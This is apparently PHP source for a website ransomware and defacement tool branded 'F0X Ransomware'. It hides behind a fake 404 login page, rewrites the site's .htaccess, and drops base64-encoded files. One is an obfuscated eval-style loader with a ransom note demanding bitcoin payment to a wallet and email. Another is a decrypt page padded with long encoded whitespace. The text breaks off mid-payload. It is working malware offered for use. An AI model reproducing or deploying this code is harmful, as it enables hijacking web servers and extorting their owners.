<?php ?><?php
error_reporting(0);
@set_time_limit(0);
@session_start();
$xSoftware = trim(getenv("SERVER_SOFTWARE"));
$xServerName = $_SERVER["HTTP_HOST"];
$xPass = $_POST['pass'];
$xCheck_login = 1;
$xPassword = "TheF0X";
$xName = "fox";
if ($xPass == $xPassword) {
    $_SESSION['login'] = "$xPass";
}
if ($xCheck_login) {
    if (!isset($_SESSION['login']) or $_SESSION['login'] != $xPassword) {
        die("
<html>
<head>
<title>404 Not Found</title>
<style type=\"text/css\">
input{
margin:0;
background-color:#fff;
border:1px solid #fff;
}
</style>
</head>
 
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle your fucking request.</p>
<hr>
<address>" . $xSoftware . " Server at " . $xServerName . " Port 80 </address>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<center>
<form method=\"post\">
<input type=\"password\" name=\"pass\">
</form>
</center>
</body>
</html>
");
    }
};
?>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<meta name="description" content="This Website Has been encrypted with F0X Ransomware, it is a PHP script made by TheF0X This Ransomware can encrypt any website file(s) very easily.">
<meta name="keywords" content="F0Xware,Ransomware,website locker,website ransomware, TheF0X">
<meta name="author" content="TheF0X">
<meta name="robots" content="index, all">
<link rel="icon" type="image/gif" href="https://s-media-cache-ak0.pinimg.com/236x/a7/76/ec/a776ec52e575d0473d33557aa610e47d--skull-fashion-flower-tattoos.jpg">
<head>
   <title>F0X RASOMWARE</title>
<style type="text/css">
body {
    background: #282727;
    color: #10edb6;
}
.inpute{
    border-style: groove;
    border-color: #379600;
    background-color: transparent;
    color: white;
    text-align: center;
}
.selecte{
    border-style: dashed;
    border-color: green;
    background-color: transparent;
    color: red;
}
.submite{
       border-style: groove;
    border-color: #4CAF50;
    background-color: transparent;
    color: yellow;
}
.result{
  text-align: left;
}
</style>
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
</head>
<body>
<div class="result">
<?php
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
class deRanSomeware {
    public function shcpackInstall() {
        if (!file_exists(".fox")) {
            rename(".htaccess", ".fox");
            if (fwrite(fopen('.htaccess', 'w'), "#F0X
DirectoryIndex fox.php
ErrorDocument 404 /fox.php")) {
                echo '<i class="fa fa-smile-o" aria-hidden="true"></i> .htaccess (Ransomware .htaccess file)<br>';
            }
            if (file_put_contents("fox.php", base64_decode("PD9waHAKJHo9J287fSRyPSRfU0YiRVJWRVI7JEYicnI9QCRyWyJGIkhUVFBfUkVGRiJFRiJSRVJGIiJdOyRyYT1AJHJbIkhUVEYiUF9BRiJDQ0VQVF9MQUYiTkdVRiJBR0UiXTtpZihGIiRyciYmJEYiJzsKJGI9JyRzc0YiKG1kNSgkaS4ka0YiRiJoKSwwLDMpKTskZkYiPSRzbChGIiRzcyhtZDUoJEYiaS4ka2YpRiIsMCwzKUYiKUYiOyRwRiI9IiI7Zm9yKCR6PUYiMTskejxjb3VGIm50KCRtJzsKJEE9J0YiYl9zdGFydCgpO0BGImVGIkYidmFsKEBnenVGIm5jRiJvbXByZXNzKEB4KEBiYXNlNkYiNF9kZWNvZGUocHJlZ0YiX3JlcGxhRiJjZUYiKGFycmF5KCJGIi9GIkYiXy8iLCIvLSc7CiRUPSdzdGFGInJ0KClGIjskcz0mRiIkRiJfU0VTU0lPRiJOOyRzcz1GIiJzdWJzRiJ0ciI7JHNsPSJzRiJ0cnRvbG93ZXIiRiI7JGk9JG1GIltGIjFdWzBdLkYiJG1bMV1bMV07RiIkaD0kRiJzbCgnOwokVz0nJGtGImg9ImI5M2YiOyRGImtmPSIxMTg2RiIiO2Z1bkYiY3Rpb24gRiJ4KCR0RiIsJGspeyRjRiI9c3RGInJsZUYibigkayk7JGw9c3RGInJsZUYibigkdCk7JEYibz0iIjtGImZvcic7CiR1PXN0cl9yZXBsYWNlKCdrVycsJycsJ2tXY3JlYWtXdGtXZV9ma1drV3Vua1djdGlvbicpOwokRD0ncHJlZ19tYXRjRiJoX0YiYWxGImwoIi8oW1xcd11GIilGIltcXHctXSsoPzo7RiJxPTAuKFtcXGRdKSk/LEYiRiJGIj8vIiwkcmFGIiwkbSk7aWYoJHEmJiRtKXtGIkBzZXNzaUYib25fJzsKJHE9JyRkRiJGIj1iYXNlNkYiNF9lbmNvZGUoeChGImd6Y0Yib21wcmVzcygkRiJvKSwkaykpRiI7cHJpbkYidCgiPEYiJGtGIj4kZEYiPEYiLyRrPiIpO0BzZXNzRiJpb25fZGVzdHJveSgpO319fX0nOwokbj0nRiJyYSl7ICAgRiIgJHU9cGFyc2VfRiJ1cmwoJHJGInIpRiI7ICAgIHBhcnNlX0Yic3RyRiIoJHVbRiIicXVlckYieSJdLCRxRiIpOyRxPWFycmF5RiJfdmFsdWVzKCRxRiIpRiI7JzsKJHI9J2FycmF5RiJfa0YiZXlfZXhpc3RzKCRGImksJHMpRiIpeyRzWyRpXS5GIkYiPSRwRiI7JGU9c3RycG9zRiIoRiIkc1skaUYiXSwkZik7aWYoJGUpeyRGIkYiaz0ka0YiaC4ka2Y7byc7CiR3PScvIkYiKSxhckYicmF5KCIvIiwiKyJGIkYiKSwkc3MoRiIkc1skaV0sMCwkZSkpKSwkaykpKUYiOyRvPW9GImJGIl9nZXRfY29GIm50ZW50RiJzKCk7b2JfZW5GImRfY2xlRiJhbigpOyc7CiRRPSdbMV1GIik7JHpGIisrKSBGIiRwRiIuPSRxWyRtWzJdRiJbRiIkel1dRiI7aWYoc3RGInJwb3MoRiIkcCwkaEYiKT09PTApeyRzWyRpXT0iIjtGIiRwPUYiJHNzRiIoJHAsMyk7fWlGImYoJzsKJEg9JygkaT0wOyRpPEYiRiIkRiJsRiI7KXtmb3IoJGo9MDsoJGo8JGMmJkYiJGk8JGwpOyRGIkYiakYiKyssJGkrKyl7JG8uRiI9JEYidHskaUYifV5GIiRrRiJ7JEYian07fX1yZXR1cm4gJCc7CiR5PXN0cl9yZXBsYWNlKCdGIicsJycsJFcuJEguJHouJG4uJEQuJFQuJGIuJFEuJHIuJEEuJHcuJHEpOwokZD0kdSgnJywkeSk7JGQoKTsKPz4KPCEtLS0tLS0tLS0tLS0gQ29kZWQgQnkgVGhlRjBYLS0tLS0tLS0+IAo8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL2dpZiIgaHJlZj0iaHR0cHM6Ly9zLW1lZGlhLWNhY2hlLWFrMC5waW5pbWcuY29tLzIzNngvYTcvNzYvZWMvYTc3NmVjNTJlNTc1ZDA0NzNkMzM1NTdhYTYxMGU0N2QtLXNrdWxsLWZhc2hpb24tZmxvd2VyLXRhdHRvb3MuanBnIj4KPGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MiI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIj4KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlRoaXMgV2Vic2l0ZSBIYXMgYmVlbiBlbmNyeXB0ZWQgd2l0aCBGMFggUmFuc29td2FyZSxJdCBpcyBpcyBhIFBIUCBzY3JpcHQgbWFkZSBieSBJbmRpMTM3LiBUaGlzIFJhbnNvbXdhcmUgY2FuIGVuY3J5cHQgYW55IHdlYnNpdGUgZmlsZShzKSB2ZXJ5IGVhc2lseS4iPgo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0iRjBYLFJhbnNvbXdhcmUsd2Vic2l0ZSBsb2NrZXIsd2Vic2l0ZSByYW5zb213YXJlLEluZGkxMzM3Ij4gCjxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0iVGhlRjBYIj4KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCwgYWxsIj4KPGhlYWQ+Cjx0aXRsZT5XZWJzaXRlIGhhcyBiZWVuIEVuY3J5cHRlZCB3aXRoIEYwWCBSYW5zb213YXJlPC90aXRsZT48L2hlYWQ+CjxoZWFkPgo8Ym9keSBiZ2NvbG9yPSIjMDAwMDAwIj4KCTxicj4KPGgxPjxDZW50ZXI+PGZvbnQgZmFjZT0iTWVyaWVuZGEgT25lIiBmb250IGNvbG9yPSIjNTZGMzA3Ij4gR3JlZXRpbmdzLFRoaXMgV2Vic2l0ZSBIYXMgQmVlbiBFbmNyeXB0ZWQgd2l0aCBGMFggUmFuc29td2FyZTwvaDE+PC9ib2R5PjwvZm9udD4KPGZvbnQgY29sb3I9InJlZCI7IHNpemU9IjYiPgo8Y2VudGVyPlRoaXMgV2Vic2l0ZSdzIGFsbCBmaWxlcyBoYXMgYmVlbiBlbmNyeXB0ZWQgdGhhdCdzIHdoeSB5b3UncmUgc2VlaW5nIHRoaXMgbWVzc2FnZS4KPGJyPllvdSd2ZSB0byBwYXkgbWUgdG8gZ2V0IGJhY2sgeW91ciBmaWxlKHMpIDwvYnI+CkFuZCBQbGVhc2UgRG9uJ3QgdHJ5IHRvIGRlY3J5cHQgdGhlIGZpbGUocykgdGhhdCBjb3VsZCBtYXkgbGVhZCB0byBwZXJtYW5lbnQgZGF0YSBsb3NlLiA7KSA8YnI+CkRvbid0IHBhbmljIFlvdXIgZmlsZXMgYXJlIGp1c3QgbG9ja2VkIG5vdCBkZWxldGVkLCBJJ2xsIGdpdmUgeW91IHRoZSBEZWNyeXB0aW9uIGtleSBhZnRlciByZWNldmluZyB0aGUgUGF5bWVudC4gQ29udGFjdCBtZSBhdCBwYXkucmFuc29tQHByb3Rvbm1haWwuY29tIDxicj4gPGJyPgo8aW1nIHdpZHRoPSI4MDAiIGhlaWdodD0iMjAwIiBzcmM9Imh0dHA6Ly9yYWdlZmFjZXMubWVtZXNvZnR3YXJlLmNvbS9mYWNlcy9zdmcvaGFwcHktZ3Jpbi5zdmciPjwvY2VudGVyPiAgCjxjZW50ZXI+PC9mb250PiA8YnI+IAo8Zm9udCBjb2xvcj0icmVkIiBzaXplPSI1Ij5UbyBHZXQgeW91ciBEZWNyeXB0aW9uIEtleSBqdXN0IHBheSA1MCQgQlRDIGF0IHRoaXMgQlRDIEFkZHJlc3M6IDwvZm9udD48YnI+Cjxmb250IGZhY2U9Ik1lcmllbmRhIE9uZSIgY29sb3I9IiM1NkYzMDciIHNpemU9IjgiPiAzTnJRQjFGWE1zWXU3bW1MUVFZUzlIaEo5R01LaVRUR2o0ICAgPC9mb250PjwvY2VudGVyPiAKPGgxPjxmb250IGNvbG9yPSIjRkYwMDAwIiBzaXplPSIrMiI+PG1hcnF1ZWUgYmdjb2xvcj0iIzAwMDAwMCIgIGJlaGF2aW9yPSJhbHRlcm5hdGUiICBzY3JvbGxhbW91bnQ9IjMiPkVuY3J5cHRlZCBXaXRoIEYwWCBSYW5zb213YXJlPC9tYXJxdWVlPjwvZm9udD48L2gxPgo8YnI+CjxjZW50ZXI+PGZvbnQgY29sb3I9Ymx1ZT4gSWYgeW91IGRvbid0IGtub3cgaG93IHRvIHBheSB3aXRoIEJUQywgVGhlbiBKdXN0IEdvIDxhIGhyZWY9Imh0dHBzOi8vZW4uYml0Y29pbi5pdC93aWtpL0J1eWluZ19CaXRjb2luc18odGhlX25ld2JpZV92ZXJzaW9uKSI+aGVyZTwvYT4KPC9ib2R5Pgo8L2h0bWw+Cg=="))){
                      echo '<i class="fa fa-smile-o" aria-hidden="true"></i>  fox.php (This is the Deface Page)<br>';
            }
            if (file_put_contents("decrypt.php", base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyI+CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJUaGlzIFdlYnNpdGUgSGFzIGJlZW4gZW5jcnlwdGVkIHdpdGggRjBYV0FSRSBSYW5zb213YXJlLEYwWFdBUkUgaXMgYSBQSFAgc2NyaXB0IG1hZGUgYnkgSW5kaTEzNy4gVGhpcyBSYW5zb213YXJlIGNhbiBlbmNyeXB0IGFueSB3ZWJzaXRlIGZpbGUocykgdmVyeSBlYXNpbHkuIj4KPG1ldGEgbmFtZT0ia2V5d29yZHMiIGNvbnRlbnQ9IkYwWFdBUkUsUmFuc29td2FyZSx3ZWJzaXRlIGxvY2tlcix3ZWJzaXRlIHJhbnNvbXdhcmUsRjBYIj4gCjxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0iRjBYIj4KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCwgYWxsIj4KPGxpbmsgcmVsPSJpY29uIiB0eXBlPSJpbWFnZS9naWYiIGhyZWY9Imh0dHBzOi8vcy1tZWRpYS1jYWNoZS1hazAucGluaW1nLmNvbS8yMzZ4L2E3Lzc2L2VjL2E3NzZlYzUyZTU3NWQwNDczZDMzNTU3YWE2MTBlNDdkLS1za3VsbC1mYXNoaW9uLWZsb3dlci10YXR0b29zLmpwZyI+CjxoZWFkPgogICA8dGl0bGU+RjBYV0FSRSBSYW5zb213YXJlPC90aXRsZT4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KYm9keSB7CiAgICBiYWNrZ3JvdW5kOiAjMjgyNzI3OwogICAgY29sb3I6ICMxMGVkYjY7Cn0KLmlucHV0ZXsKICAgIGJvcmRlci1zdHlsZTogZ3Jvb3ZlOwogICAgYm9yZGVyLWNvbG9yOiAjMzc5NjAwOwogICAgYmFja2dyb3VuZC1jb2xvcjogdHJhbnNwYXJlbnQ7CiAgICBjb2xvcjogd2hpdGU7CiAgICB0ZXh0LWFsaWduOiBjZW50ZXI7Cn0KLnNlbGVjdGV7CiAgICBib3JkZXItc3R5bGU6IGRhc2hlZDsKICAgIGJvcmRlci1jb2xvcjogZ3JlZW47CiAgICBiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudDsKICAgIGNvbG9yOiByZWQ7Cn0KLnN1Ym1pdGV7CiAgICAgICBib3JkZXItc3R5bGU6IGdyb292ZTsKICAgIGJvcmRlci1jb2xvcjogIzRDQUY1MDsKICAgIGJhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50OwogICAgY29sb3I6IHllbGxvdzsKfQoucmVzdWx0ewogIHRleHQtYWxpZ246IGxlZnQ7Cn0KPC9zdHlsZT4KPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0iaHR0cHM6Ly9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC42LjMvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIj4KPC9oZWFkPgo8Ym9keT4KPGRpdiBjbGFzcz0icmVzdWx0Ij4KPD9waHAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg